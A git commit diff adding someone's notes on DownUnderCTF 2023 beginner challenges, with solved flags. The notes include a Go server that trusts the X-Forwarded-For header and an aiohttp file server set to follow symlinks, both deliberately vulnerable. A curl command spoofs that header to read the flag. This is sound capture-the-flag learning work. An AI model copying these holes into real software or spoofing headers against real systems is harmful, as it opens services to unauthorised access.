htb updates and ductf update

2023-09-01 16:37:29 +02:00
parent 82b0759f1e
commit c42b50e6fd
38 changed files with 317 additions and 19 deletions
--- a/2023/.idea/.gitignore
+++ b/2023/.idea/.gitignore
@@ -0,0 +1,3 @@
+# Default ignored files
+/shelf/
+/workspace.xml
--- a/2023/.idea/DownUnderCTF
+++ b/2023/.idea/DownUnderCTF
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="PYTHON_MODULE" version="4">
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$" />
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>
--- a/2023/.idea/inspectionProfiles/profiles_settings.xml
+++ b/2023/.idea/inspectionProfiles/profiles_settings.xml
@@ -0,0 +1,6 @@
+<component name="InspectionProjectProfileManager">
+  <settings>
+    <option name="USE_PROJECT_PROFILE" value="false" />
+    <version value="1.0" />
+  </settings>
+</component>
--- a/2023/.idea/misc.xml
+++ b/2023/.idea/misc.xml
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectRootManager" version="2" project-jdk-name="Python 3.11" project-jdk-type="Python SDK" />
+</project>
--- a/2023/.idea/modules.xml
+++ b/2023/.idea/modules.xml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/DownUnderCTF 2023.iml" filepath="$PROJECT_DIR$/.idea/DownUnderCTF 2023.iml" />
+    </modules>
+  </component>
+</project>
--- a/2023/.idea/vcs.xml
+++ b/2023/.idea/vcs.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="VcsDirectoryMappings">
+    <mapping directory="$PROJECT_DIR$/.." vcs="Git" />
+  </component>
+</project>
--- a/2023/beginner/Welcome
+++ b/2023/beginner/Welcome
@@ -0,0 +1,13 @@
+Aufgabe:
+
+```
+To compile our code down here, we have to write it in the traditional Australian Syntax: ( Try reading bottom up! )
+
+¡ƃɐlɟ ǝɥʇ ʇno noʎ ʇuᴉɹd ll,ʇᴉ puɐ ɹǝʇǝɹdɹǝʇuᴉ ǝɥʇ ɥƃnoɹɥʇ ʇᴉ unɹ puɐ ǝɹǝɥ ǝpoɔ sᴉɥʇ ǝʞɐʇ ʇsnJ .ƎWWIפ uɐɔ noʎ NOʞƆƎɹ I puɐ ┴∩Oq∀ʞ˥∀M ƃuᴉoפ '¡H∀N H∀Ǝ⅄ 'ɐʞʞɐ⅄ pɹɐH 'ǝʞᴉl sǝɹnʇɐǝɟ ɔᴉʇsɐʇuɐɟ ƃuᴉɹnʇɐǝℲ
+
+.snlԀ snlԀ ǝᴉssn∀ ǝʌᴉsnlɔuᴉ ʎʇᴉuɐɟoɹd ǝɹoɯ 'ɹǝʇsɐɟ 'ɹǝʇʇǝq ǝɥʇ oʇ noʎ ǝɔnpoɹʇuᴉ I uɐɔ ʇnq ++Ɔ ɟo pɹɐǝɥ ǝʌ,no⅄
+
+Author: pix
+file: welcome_to_ductf.aplusplus
+```
+
--- a/DUCTF!/welcome_to_ductf.aplusplus
+++ b/DUCTF!/welcome_to_ductf.aplusplus
@@ -0,0 +1,41 @@
+¡***Ɔ SɹƎƎHƆ
+
+;„¡Ⅎ┴Ɔ ǝɥʇ ɟo ʇsǝɹ ǝɥʇ ʎoɾuƎ„ ƎWWIפ
+
+;()Ⅎ┴Ɔ_ƎH┴
+
+<
+;H┴MƎɹ┴S + ɹnoHʎddɐH + Ⅎ∀˥פ ƎWWIפ	
+;„ɔoɹɔ ɐ ɹɐǝu ʇᴉ ʇɟǝl oƃuoɹp ʎpoolq ʇɥƃᴉɹ ǝɯos 'ʇᴉ punoɟ I 'ǝʇɐɯ llǝɥ ʎpoolq„ ƎWWIפ  
+<	
+;SIH┴ ʞƆ∩Ⅎ Ǝ┴∀W ¿ 0 == (9 '0)ǝɔᴉDǝɯoSʞɔnɥƆ NOʞƆƎɹ ∀⅄		
+
+;(000Ɩ)ʞɔɐSǝɥ┴ʇᴉH		
+		
+;„...ƃɐlɟ ɐʎ sᴉ ɥɐlɐƃ ,uᴉɯɐlɟ ǝɥʇ ǝɹǝɥM„ ƎWWIפ    	
+> (¡H∀N 'H∀Ǝ⅄) ˥I┴N∩ ┴∩Oq∀ʞ˥∀M ∀ ƎΛ∀H ˥˥,I NOʞƆƎɹ I	
+;„ƎɹƐɥʍƐɯoϛ_ʞɔ0lƆoϛ-sʇƖ„ = ɹnoHʎddɐH NOʞƆƎɹ I    
+;„¡ǝʇɐɯ ɐʎ ɹoɟ ƃɐlɟ ǝɥʇ u,ɥɔʇǝℲ„ ƎWWIפ	
+> () SI Ⅎ┴Ɔ_ƎH┴ ɹOℲ ∀ʞʞ∀⅄ Dɹ∀H ƎH┴
+;„{Ⅎ┴Ɔ∩D„ = Ⅎ∀˥פ NOʞƆƎɹ I
+
+  
+<
+;(000ϛ)ʞɔɐSǝɥ┴ʇᴉH  
+  
+<  
+;פ∀˥Ⅎ_∀⅄ ƎWWIפ    
+> ¿ Ɩ == Qqq_ƎW NOʞƆƎɹ ∀⅄  
+
+;„}¡ǝʇɐWǝɹǝHʇ,uᴉ∀ƃɐlℲɐ⅄{∩DℲ┴Ɔ„ = פ∀˥Ⅎ_∀⅄ NOʞƆƎɹ I  
+;Ɩ = Qqq_ƎW NOʞƆƎɹ I  
+  
+;(000ϛ)ʞɔɐSǝɥ┴ʇᴉH  
+;„פ∀˥Ⅎ ƎH┴ ┴NIɹԀ S┴Ǝ˥ '¡Ǝ┴∀W H∀Ǝ⅄„ ƎWWIפ  
+> () SI פ∀˥Ⅎ_┴NIɹԀ ɹOℲ ∀ʞʞ∀⅄ Dɹ∀H ƎH┴
+
+;ǝɔᴉDǝɯoSʞɔnɥƆ ƆN∩Ⅎ ƎW ┴HOԀWI
+;„}„ = H┴MƎɹ┴S NOʞƆƎɹ I
+;ʞɔɐSǝɥ┴ʇᴉH ƆN∩Ⅎ ƎW ┴HOԀWI
+
+¡Ǝ┴∀W ⅄∀D,פ
--- a/2023/beginner/X/README.md
+++ b/2023/beginner/X/README.md
@@ -0,0 +1,17 @@
+Aufgabe:
+
+```
+We like to reminisce about the lit memes that have been made by competitiors and organisers alike! Have you checked out the meme dump?
+```
+
+Die wörter "the meme dump" sind verlinkt
+
+the: https://twitter.com/DownUnderCTF/status/1697304493409337835
+meme: https://twitter.com/DownUnderCTF/status/1697308270439051484
+dump: https://twitter.com/DownUnderCTF/status/1697312042821066846
+
+Jedes bild hat kleine gelbe Strings, die die Flagge bilden, aber die bilder sind nicht immer in der richtigen Reihenfolge:
+
+```
+DUCTF{ThanksEl0nWeCantCall1tTheTw1tterFl4gN0w}
+```
--- a/2023/beginner/proxed/README.md
+++ b/2023/beginner/proxed/README.md
@@ -0,0 +1,58 @@
+Go Source:
+
+```go
+package main
+
+import (
+	"flag"
+	"fmt"
+	"log"
+	"net/http"
+	"os"
+	"strings"
+)
+
+var (
+	port = flag.Int("port", 8081, "The port to listen on")
+)
+
+func main() {
+
+	flag.Parse()
+
+	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
+		xff := r.Header.Values("X-Forwarded-For")
+
+		ip := strings.Split(r.RemoteAddr, ":")[0]
+
+		if xff != nil {
+			ips := strings.Split(xff[len(xff)-1], ", ")
+			ip = ips[len(ips)-1]
+			ip = strings.TrimSpace(ip)
+		}
+
+		if ip != "31.33.33.7" {
+			message := fmt.Sprintf("untrusted IP: %s", ip)
+			http.Error(w, message, http.StatusForbidden)
+			return
+		} else {
+			w.Write([]byte(os.Getenv("FLAG")))
+		}
+	})
+
+	log.Printf("Listening on port %d", *port)
+	log.Fatal(http.ListenAndServe(fmt.Sprintf(":%d", *port), nil))
+}
+
+```
+
+Es ist ziemlich eindeutig, dass man seine IP Adresse spoofen soll, um die Flagge aus den ENV vars zu lesen.
+
+Ein hilfreicher Stack-Overflow Beitrag hilft dabei: https://stackoverflow.com/questions/5188584/how-can-i-spoof-the-sender-ip-address-using-curl
+
+=> SOLVED
+```bash
+┌──(kali㉿kali)-[/ctf/DownUnderCTF 2023/beginner/static file server]
+└─$ curl --header "X-Forwarded-For: 31.33.33.7" http://proxed.duc.tf:30019/
+DUCTF{17_533m5_w3_f0rg07_70_pr0x} 
+```
--- a/2023/beginner/proxed/proxed/Dockerfile
+++ b/2023/beginner/proxed/proxed/Dockerfile
@@ -0,0 +1,13 @@
+FROM golang:1.20-alpine3.17
+
+WORKDIR /app
+
+COPY . ./
+
+RUN go build -o app ./...
+
+EXPOSE 8081
+
+USER goodboy:goodboy
+
+CMD ["./app"]
--- a/2023/beginner/proxed/proxed/cmd/secret_server/main.go
+++ b/2023/beginner/proxed/proxed/cmd/secret_server/main.go
@@ -0,0 +1,42 @@
+package main
+
+import (
+	"flag"
+	"fmt"
+	"log"
+	"net/http"
+	"os"
+	"strings"
+)
+
+var (
+	port = flag.Int("port", 8081, "The port to listen on")
+)
+
+func main() {
+
+	flag.Parse()
+
+	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
+		xff := r.Header.Values("X-Forwarded-For")
+
+		ip := strings.Split(r.RemoteAddr, ":")[0]
+
+		if xff != nil {
+			ips := strings.Split(xff[len(xff)-1], ", ")
+			ip = ips[len(ips)-1]
+			ip = strings.TrimSpace(ip)
+		}
+
+		if ip != "31.33.33.7" {
+			message := fmt.Sprintf("untrusted IP: %s", ip)
+			http.Error(w, message, http.StatusForbidden)
+			return
+		} else {
+			w.Write([]byte(os.Getenv("FLAG")))
+		}
+	})
+
+	log.Printf("Listening on port %d", *port)
+	log.Fatal(http.ListenAndServe(fmt.Sprintf(":%d", *port), nil))
+}
--- a/2023/beginner/proxed/proxed/go.mod
+++ b/2023/beginner/proxed/proxed/go.mod
@@ -0,0 +1,3 @@
+module github.com/DownUnderCTF/proxed
+
+go 1.20
--- a/2023/beginner/static
+++ b/2023/beginner/static
@@ -0,0 +1,60 @@
+https://web-static-file-server-9af22c2b5640.2023.ductf.dev/files/not_the_flag.txt ->
+
+```
+The real flag is at /flag.txt
+```
+
+https://web-static-file-server-9af22c2b5640.2023.ductf.dev/flag.txt ->
+
+```
+404
+```
+
+Web source code
+```python
+from aiohttp import web
+
+async def index(request):
+    return web.Response(body='''
+        <header><h1>static file server</h1></header>
+        Here are some files:
+        <ul>
+            <li><img src="/files/ductf.png"></img></li>
+            <li><a href="/files/not_the_flag.txt">not the flag</a></li>
+        </ul>
+    ''', content_type='text/html', status=200)
+
+app = web.Application()
+app.add_routes([
+    web.get('/', index),
+
+    # this is handled by https://github.com/aio-libs/aiohttp/blob/v3.8.5/aiohttp/web_urldispatcher.py#L654-L690
+    web.static('/files', './files', follow_symlinks=True)
+])
+web.run_app(app)
+```
+
+Dockerfile:
+```docker
+FROM python:3.10
+
+WORKDIR /app
+COPY app.py .
+COPY flag.txt /flag.txt
+COPY files/ files/
+
+RUN pip3 install aiohttp
+
+RUN /usr/sbin/useradd --no-create-home -u 1000 ctf
+USER ctf
+
+CMD ["python3", "app.py"]
+```
+
+=> Flag in root dir 
+
+=> need to make the server read the arbitrary file
+
+
+Wenn wir symlinks erstellen könnten können wir einen symlink ins root verzeichnis erstellen
+
--- a/server/static-file-server/Dockerfile
+++ b/server/static-file-server/Dockerfile
@@ -0,0 +1,13 @@
+FROM python:3.10
+
+WORKDIR /app
+COPY app.py .
+COPY flag.txt /flag.txt
+COPY files/ files/
+
+RUN pip3 install aiohttp
+
+RUN /usr/sbin/useradd --no-create-home -u 1000 ctf
+# USER ctf  #permission denied on my machine
+
+CMD ["python3", "app.py"]
--- a/server/static-file-server/app.py
+++ b/server/static-file-server/app.py
@@ -0,0 +1,20 @@
+from aiohttp import web
+
+async def index(request):
+    return web.Response(body='''
+        <header><h1>static file server</h1></header>
+        Here are some files:
+        <ul>
+            <li><img src="/files/ductf.png"></img></li>
+            <li><a href="/files/not_the_flag.txt">not the flag</a></li>
+        </ul>
+    ''', content_type='text/html', status=200)
+
+app = web.Application()
+app.add_routes([
+    web.get('/', index),
+
+    # this is handled by https://github.com/aio-libs/aiohttp/blob/v3.8.5/aiohttp/web_urldispatcher.py#L654-L690
+    web.static('/files', './files', follow_symlinks=True)
+])
+web.run_app(app)
--- a/server/static-file-server/files/ductf.png
+++ b/server/static-file-server/files/ductf.png
--- a/server/static-file-server/files/not_the_flag.txt
+++ b/server/static-file-server/files/not_the_flag.txt
@@ -0,0 +1 @@
+The real flag is at /flag.txt
--- a/server/static-file-server/flag.txt
+++ b/server/static-file-server/flag.txt
@@ -0,0 +1 @@
+FLAG